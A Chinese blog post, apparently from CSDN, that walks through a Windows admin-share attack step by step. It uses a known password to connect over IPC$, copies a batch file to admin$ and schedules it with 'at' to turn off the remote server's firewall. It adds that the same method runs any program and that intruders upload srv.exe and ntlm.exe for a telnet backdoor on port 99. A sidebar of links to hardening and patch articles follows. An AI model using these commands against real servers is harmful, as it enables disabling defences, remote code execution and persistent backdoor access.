Windows共享漏洞

最新推荐文章于 2021-08-06 14:14:44 发布
最新推荐文章于 2021-08-06 14:14:44 发布
阅读量978 收藏
点赞数
分类专栏: windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiuzhentianting/article/details/48474097
版权

关闭防火墙命令 
用Windows xp SP2版本,打开开始菜单,点计控制面版,里面有个安全中心,点它,打开对话筐后,点吉Windows防火墙,点击关闭(不推荐),即可关闭。 
cmd停止防火墙命令 
开始-运行-CMD net stop sharedaccess 这样就可以关掉windows自带的防火墙 
打开防火墙命令 
可以用net start sharedaccess启动

 

137,138,139,445端口,本漏洞是连接的445端口。

 

下面关闭一个知道服务器密码的服务器的防火墙:

 

1、在本机D盘新建一个Bat文件,内容

net stop sharedaccess

 

2、运行本机cmd

 

3、连接远程服务器

net use \\IP Address\IPC$ "password" /user:username

比如

net use \\192.168.1.100\IPC$ "pwd" /user:Administrator

如果成功,会提示:命令成功完成。

 

4、下面复制文件:

copy D:\Run.bat \\192.168.1.100\admin$

成功会提示:已复制         1 个文件。

 

连接成功后,需要进一步掌握目标服务器,黑客通常喜欢上传srv.exe和ntlm.exe这两个程序。srv是打开目标服务器的99端口,可以让黑客Telnet到服务器;ntlm程序主要把Telnet的默认NTLM验证改变。

黑客把程序复制到目标服务器的admin$目录下,盘符目录符对照表如下:

c$: c驱动器;

d$: d驱动器;

……依次类推。

需要特别注明的是:

admin$是Windows NT下面的一个默认共享,指WINNT所在的目录。
ipc$指的是服务器的共享,如果不存在ipc$,就不可以远程连接。

 

5、查看远程电脑时间

net time \\192.168.1.100

 

返回:\\192.168.1.100 的当前时间是 2010/8/5 下午 04:27

 

6、建立比当前时间再晚一些的一次性计划任务

at \\192.168.1.100 16:35 Run.bat

返回:新加了一项作业,其作业 ID = 1

 

等到时间,目标服务器的防火墙服务就关闭了。

 

按照以上方法,还可以运行各种程序。

 

 

注意:还可以以窗口方式复制文件:

net use 本地盘符 \\目标IP\目标盘符。

例如:

net use z: \\192.168.1.100\c$

xiuzhentianting
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
微软服务器安全补丁,Microsoft Windows SMB服务器安全更新(4013389)补丁 官方勒索病毒漏洞修复版(图文)...
weixin_35725654的博客
08-09 4327
软件介绍Microsoft Windows SMB服务器安全更新(4013389)补丁是一款微软官方Microsoft安全公告 MS17-010 - 严重Microsoft Windows SMB 服务器安全更新(4013389)勒索病毒修复中文特别补丁,此安全更新程序修复了 Microsoft Windows 中的多个漏洞。如果攻击者向 WindowsSMBv1 服务器发送特殊设计的消息,那么其...
smb+服务器+修复,Microsoft Windows
weixin_30789921的博客
08-05 740
Microsoft Windows SMB服务器安全更新(4013389)补丁是一款微软官方Microsoft 安全公告 MS17-010 - 严重Microsoft Windows SMB 服务器安全更新 (4013389)勒索病毒修复中文特别补丁,此安全更新程序修复了 Microsoft Windows 中的多个漏洞。如果攻击者向 Windows SMBv1 服务器发送特殊设计的消息,那么其中...
windows系统漏洞加固
04-18
一. 账号口令 1.1 检查是否已启用密码复杂性要求(低危) 1.2 检查是否已正确配置密码长度最小值(低危) 1.3 检查是否按组进行用户管理(低危) 1.4 检查是否按照权限、责任创建、使用用户账号(低危) 1.5 检查是否已正确配置“复位帐户锁定计数器”时间(低危) 1.6 检查是否已正确配置帐户锁定阈值(低危) 1.7 检查是否已删除或禁用高危帐户(低危) 1.8 检查是否已正确配置密码最长使用期限(低危) 1.9 检查是否已正确配置“强制密码历史”(低危) 1.10 检查是否已正确配置密码最短使用期限(低危) 1.11 域环境:检查是否已启用“域环境下禁止计算机帐户更改密码”策略(低危) 1.12 检查是否已更改管理员帐户名称(低危) 1.13 检查是否已正确配置帐户锁定时间(低危) 二. 认证授权 2.1 检查是否已限制可关闭系统的帐户和组(低危) 2.2 检查是否已限制可从远端关闭系统的帐户和组(低危) 2.3 检查是否已限制“取得文件或其它对象的所有权”的帐户和组(低危) 2.4 检查是否已正确配置“从网络访问此计算机”策略(低危) 2.5 检查是否已正确配置“允许本地登录”策略(低危) 2.6 检查是否已删除可远程访问的注册表路径和子路径(低危) 2.7 检查是否已限制匿名用户连接(低危) 2.8 检查是否已删除可匿名访问的共享和命名管道(低危) 三. 日志审计 3.1 检查是否已正确配置应用程序日志(低危) 3.2 检查是否已正确配置审核(日志记录)策略(低危) 3.3 检查是否已正确配置系统日志(低危) 3.4 检查是否已正确配置安全日志(低危) 四. 协议安全 4.1 检查是否已开启Windows防火墙(低危) 4.2 检查是否已启用TCP/IP筛选功能(低危) 4.3 检查是否已修改默认的远程桌面(RDP)服务端口(低危) 4.4 检查是否已禁用路由发现功能(低危) 4.5 检查是否已正确配置重传单独数据片段的次数(低危) 4.6 检查是否已启用并正确配置源路由攻击保护(低危) 4.7 检查是否已删除SNMP服务的默认public团体(低危) 4.8 检查是否已禁用失效网关检测(低危) 4.9 检查是否已启用并正确配置TCP碎片攻击保护(低危) 4.10 检查是否已启用并正确配置ICMP攻击保护(低危) 4.11 检查是否已正确配置TCP“连接存活时间”(低危) 4.12 检查是否已启用并正确配置SYN攻击保护(低危) 五. 其他安全 5.1 检查是否已关闭不必要的服务-Windows Internet Name Service (WINS)(高危) 5.2 检查是否已关闭不必要的服务-Remote Access Connection Manager(高危) 5.3 检查是否已禁止Windows自动登录(高危) 5.4 检查是否已关闭不必要的服务-Simple TCP/IP Services(高危) 5.5 检查是否已关闭不必要的服务-Simple Mail Transport Protocol (SMTP)(高危) 5.6 检查是否已关闭不必要的服务-DHCP Client(高危) 5.7 检查是否已关闭不必要的服务-Message Queuing(高危) 5.8 检查是否已关闭不必要的服务-DHCP Server(高危) 5.9 检查系统是否已安装最新补丁包和补丁(中危) 5.10 检查是否已安装防病毒软件(中危) 5.11 检查是否已禁用“登录时无须按 Ctrl+Alt+Del”策略(低危) 5.12 检查是否已创建多个磁盘分区(低危) 5.13 检查是否已启用并正确配置屏幕保护程序(低危) 5.14 检查是否已启用Windows数据执行保护(DEP)(低危) 5.15 检查是否已禁用Windows硬盘默认共享(低危) 5.16 检查磁盘分区是否都是NTFS文件系统(低危) 5.17 检查是否已关闭Windows自动播放(低危) 5.18 域环境:检查是否已正确配置域环境下安全通道数据的安全设置(低危) 5.19 域环境:检查是否已启用“域环境下需要强会话密钥”策略(低危) 5.20 域环境:检查是否已启用“需要域控制器身份验证以解锁工作站”策略(低危) 5.21 检查是否已正确配置“锁定会话时显示用户信息”策略(低危) 5.22 检查是否已启用“当登录时间用完时自动注销用户”策略(低危) 5.23 检查是否已正确配置“提示用户在密码过期之前进行更改”策略(低危) 5.24 检查是否已启用并正确配置Windows网络时间同步服务(NTP)(低危) 5.25 检查共享文件夹的权限设置是否安全(低危) 5.26 域环境:检查是否已正确配置“可被缓存保存的登录的个数”策略(低危) 5.27 检查是否已正确配置服务器在暂停会话前所需的空闲时间量(低危) 5.28 检查是否已启用“不显示最后的用户名”策略(低危) 5.29 检查是否已启用并正确配置Windows自动更新(低危)
Windows 系统共享漏洞
weixin_33752045的博客
08-01 556
2019独角兽企业重金招聘Python工程师标准>>> ...
彻底封杀Windows系统的共享漏洞
cabinbb的专栏
03-08 372
、查看共享资源   在Windows XP系统中,电脑所有的驱动器都默认为自动共享,但不会显示共享的手形标志,这就给网络安全留下了隐患。我们可以在“运行”栏中填入cmd进入命令提示符,输入net share,快速查看电脑中的共享资源,找到这些共享目录。   如果对“命令提示符”的界面不习惯,可以依次打开“控制面板→管理工具→计算机管理→共享文件夹”,查看电脑中所有的共享资源。   2、清除共享漏洞
利用net share 删除共享漏洞
diefei3662的博客
08-04 354
每个磁盘的根目录都是默认的共享目录,但是却不显示成手形标志,因此这就造成了共享漏洞net share命令可以轻松的管理WINDOWS共享目录因此只要建立一个BAT文件输入以下命令,然后创建计划任务每次开机自动运行就可以删除共享目录了  net share admin$ /del  net share ipc$ /del  net share c$ /del net shar...
Linux NFS共享目录配置漏洞
→_→
08-18 2239
声明:以下内容均来自“实验吧”免费公益渗透平台,该平台至今仍旧在维护,估计~~,为此把以前保留的笔记拿来分享下。 [实验目的] 1) 利用 NFS共享目录配置漏洞读取目标主机的/etc/passwd文件内容 [实验原理] 1) NFS服务配置漏洞赋予了根目录远程可写权限,导致/root/.ssh/authorized_keys可被修改,实现远程ssh无密码登录。 [实验环境] [实验步骤] 一、利用nmap工具扫描目标主机 1.1 在终端中输入命令“rpcinfo -p ...
微软服务器更新通知,产品技术-微软安全公告 MS17-010 Microsoft Windows SMB 服务器安全更新 (4013389)-新华三集团-H3C...
weixin_39687422的博客
08-06 1683
1漏洞信息:此安全更新程序修复了 Microsoft Windows 中的多个漏洞。如果攻击者向 Windows SMBv1 服务器发送特殊设计的消息,那么其中最严重的漏洞可能允许远程执行代码。2漏洞描述符:CVE: CVE-2017-0143、 CVE-2017-0144、 CVE-2017-0145、 CVE-2017-0146、 CVE-2017-0147、 CVE-2017-0148、 C...
永恒之蓝MS17-010漏洞利用 writeup
二十四桥明月夜的博客
07-07 2700
MS17-010漏洞: MS17-010漏洞: • 一、 MS17-010漏洞公告及相关分析报告 •二、漏洞重现 •漏洞利用防范 • 一、 MS17-010漏洞公告及相关分析报告 ★MS17_010 漏洞攻击:曾经危害全球的勒索病毒利用的永恒之蓝漏洞。 公告 Microsoft 安全公告 MS17-010 - 严重 Microsoft Windows ...
通过共享文件逻辑漏洞渗透wordpress
L_lemo004的博客
06-25 751
扫描IP 这里我的内网网段为31网段,所有我们使用ipscan扫描31网段,发现疑似站点IP 192.168.31.236,成功访问 扫描端口 确定IP后查看其开放了哪些端口 开放了22,80,139,445,3306,6667 尝试爆破22端口弱口令 ...
MS12-020(CVE-2012-0002) Exploit 3389远程溢出漏洞代码
03-09
MS12-020(CVE-2012-0002) Exploit 3389远程溢出漏洞代码
关闭共享共享漏洞的利用
01-04
一些基本常识,你可能很容易忽略,但是为了您的系统安全,为了您的资料不被窃取,还是请您稍加注意,其实,这只需要做很少的工作。
CNVDSpider:使用js爬取CNVD漏洞共享数据Crawl CNVD shared vulnerabilities with js
05-27
首先,我们需要该漏洞库的全部漏洞数据,但是,使用python书写爬虫会被反爬机制识别到,从而无法自动大量下载数据 这里,发现该网页有共享的 因此,我们考虑从这里做文章 然鹅,一个个点击下载也十分耗时,因此,...
高危Windows 0day漏洞
10-08
2010年7月16日,Windows快捷方式自动执行0day漏洞[CVE-2010-2568](微软安全知识库编 号2286198)被披露,很快网上已经可以找到利用这个漏洞攻击的样本。利用Windows快捷方式自动执行0day漏洞可以做到:看一眼恶意...
如何在3个月发现12个内核信息泄露漏洞.pdf
08-08
本文将共享一种轻量级、高效的内核信息泄漏漏洞检测方法。有两种方法在这个行业中取得了显著的效果,一种是Mateusz Jurczyk的Bochspwn,它来自于Google Project Zero,另一种是潘建峰的Digtool。Bochspwn采用CPU指令...
windows com netstat命令过滤字符
热门推荐
xiuzhentianting的博客
09-06 1万+
netstat -ano|findstr "1433"
关闭Windows Defender, 比较占用cpu和硬盘资源
xiuzhentianting的博客
08-27 6746
使用快捷键(WIN+R)调出运行工具,然后再输入组策略命令(gpedit.msc)再点击确定。 进入组策略在计算机配置下面的管理模板,Windows组件就可以看到Windows Defender这一样。 双击Windows Defender 双击关闭Windows Defender 再选择启用 最后确定
启动时运行 Chkdsk “Cannot Open Volume for Direct Access”错误信息
xiuzhentianting的博客
09-16 6522
在启动时运行 Chkdsk 时收到“Cannot Open Volume for Direct Access”(无法打开卷进行直接访问)错误信息:Cannot open volume for direct access.The type of the file system is NTFS. Windows has finished checking the disk. 其他表现:在CMD界
office 2010 你或管理员选择不安装宏或控件
xiuzhentianting的博客
02-04 6440
打开word后,依次是:文件、选项、加载项、有3个选项,勾选每个测试下,确定。 推出word再打开。
windows10打印共享补丁
最新发布
11-10
Windows 10打印共享补丁是指用于修复Windows 10操作系统中与打印共享功能相关的问题或漏洞的软件更新补丁。这些问题可能导致打印共享功能无法正常工作或存在安全风险。 打印共享补丁的安装和应用通常比较简单。首先...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值